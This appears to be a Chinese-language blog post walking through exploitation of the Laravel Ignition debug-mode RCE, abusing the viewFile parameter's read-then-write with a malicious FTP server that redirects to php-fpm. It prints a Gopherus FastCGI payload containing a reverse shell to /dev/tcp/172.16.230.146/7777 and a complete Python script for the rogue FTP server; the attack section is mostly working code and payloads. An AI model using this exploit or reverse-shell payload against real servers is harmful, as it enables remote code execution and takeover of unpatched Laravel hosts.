LARAVEL的那个RCE最有趣的点在这里

LARAVEL下的利用方式

先点题，看看在laravel下怎么触发这个漏洞

直接把上述请求body中的viewFile参数的值替换为一个恶意ftp地址就可以实现rce

那是随便一个ftp服务都可以吗？

当然不是

这个ftp服务需要满足一个条件：当客户端第一次连接时返回payload,第二次连接时将客户端连接导向其他ip:port

那为什么只要访问满足上述条件的ftp服务就可以完成攻击呢？

这咱们就得来看看laravel的代码逻辑了：

laravel在第6版之后，debug模式使用了ignition组件来美化堆栈信息，除此之外，ignition还附带了“一键修复bug”的功能，例如：如果我们在模板中使用了一个未知变量，会发生如下情况

只要我们轻轻点击“Make variable optional”就可以一键修复bug

那ignition是怎么实现这一功能的呢，抓个包看看：

其中，我们重点关注viewFile这个参数，代码中对它进行了如下处理：

$contents = file_get_contents($parameters['viewFile']); file_put_contents($parameters['viewFile'], $contents)

正是这里的一读一写操作给我们带来了利用的机会~

接下来咱们以打本机的fpm服务为例来演示如何利用上述看似安全的代码实现rce

生成payload

使用gopherus生成攻击fastcgi的payload

箭头1处输入目标服务器上的某个php文件的真实路径

箭头2处输入你想要在目标上执行的命令

得到payload:

gopher://127.0.0.1:9000/_SERVER_SOFTWAREgo / fcgiclient REMOTE_ADDR127.0.0.1SERVER_PROTOCOLHTTP/1.1CONTENT_LENGTH104REQUEST_METHODPOST KPHP_VALUEallow_url_include = On disable_functions = auto_prepend_file = php://input$SCRIPT_FILENAME/Library/WebServer/Documents/xss.php DOCUMENT_ROOT/h& /dev/tcp/172.16.230.146/7777 0>&1"');die('-----Made-by-SpyD3r----- ');?>

咱们只需要_后面的内容，也就是

SERVER_SOFTWAREgo / fcgiclient REMOTE_ADDR127.0.0.1SERVER_PROTOCOLHTTP/1.1CONTENT_LENGTH104REQUEST_METHODPOST KPHP_VALUEallow_url_include = On disable_functions = auto_prepend_file = php://input$SCRIPT_FILENAME/Library/WebServer/Documents/xss.php DOCUMENT_ROOT/h& /dev/tcp/172.16.230.146/7777 0>&1"');die('-----Made-by-SpyD3r----- ');?>

用生成的payload替换掉下面ftp脚本中的payload

搭建恶意ftp服务

写了个脚本（代码轻喷~?）：

代码语言：javascript复制

# -*- coding: utf-8 -*-
# @Time    : 2021/1/13 6:56 下午
# @Author  : tntaxin
# @File    : ftp_redirect.py
# @Software:

import socket
from urllib.parse import unquote

# 对gopherus生成的payload进行一次urldecode
payload = unquote("SERVER_SOFTWAREgo / fcgiclient 	REMOTE_ADDR127.0.0.1SERVER_PROTOCOLHTTP/1.1CONTENT_LENGTH104REQUEST_METHODPOST	KPHP_VALUEallow_url_include = On
disable_functions = 
auto_prepend_file = php://input$SCRIPT_FILENAME/Library/WebServer/Documents/xss.php
DOCUMENT_ROOT/h& /dev/tcp/127.0.0.1/7777 0>&1"');die('-----Made-by-SpyD3r-----
');?>")
payload = payload.encode('utf-8')

host = '0.0.0.0'
port = 23
sk = socket.socket()
sk.bind((host, port))
sk.listen(5)

# ftp被动模式的passvie port,监听到1234
sk2 = socket.socket()
sk2.bind((host, 1234))
sk2.listen()

# 计数器，用于区分是第几次ftp连接
count = 1
while 1:
    conn, address = sk.accept()
    conn.send(b"200 n")
    print(conn.recv(20))  # USER aaarn  客户端传来用户名
    if count == 1:
        conn.send(b"220 readyn")
    else:
        conn.send(b"200 readyn")

    print(conn.recv(20))   # TYPE Irn  客户端告诉服务端以什么格式传输数据，TYPE I表示二进制， TYPE A表示文本
    if count == 1:
        conn.send(b"215 n")
    else:
        conn.send(b"200 n")

    print(conn.recv(20))  # SIZE /123rn  客户端询问文件/123的大小
    if count == 1:
        conn.send(b"213 3 n")  
    else:
        conn.send(b"300 n")

    print(conn.recv(20))  # EPSVrn'
    conn.send(b"200 n")

    print(conn.recv(20))   # PASVrn  客户端告诉服务端进入被动连接模式
    if count == 1:
        conn.send(b"227 127,0,0,1,4,210n")  # 服务端告诉客户端需要到哪个ip:port去获取数据,ip,port都是用逗号隔开，其中端口的计算规则为：4*256 210=1234
    else:
        conn.send(b"227 127,0,0,1,35,40n")  # 端口计算规则：35*256 40=9000

    print(conn.recv(20))  # 第一次连接会收到命令RETR /123rn，第二次连接会收到STOR /123rn
    if count == 1:
        conn.send(b"125 n") # 告诉客户端可以开始数据链接了
        # 新建一个socket给服务端返回我们的payload
        print("建立连接!")
        conn2, address2 = sk2.accept()
        conn2.send(payload)
        conn2.close()
        print("断开连接!")
    else:
        conn.send(b"150 n")
        print(conn.recv(20))
        exit()

    # 第一次连接是下载文件，需要告诉客户端下载已经结束
    if count == 1:
        conn.send(b"226 n")
    conn.close()
    count  = 1

运行上述脚本，一个恶意ftp服务就起来了

这个脚本做的事情很简单，就是当客户端第一次连接的时候返回我们预设的payload

当客户端第二次连接的时候将客户端的连接重定向到127.0.0.1:9000,也就是我们的php-fpm服务的端口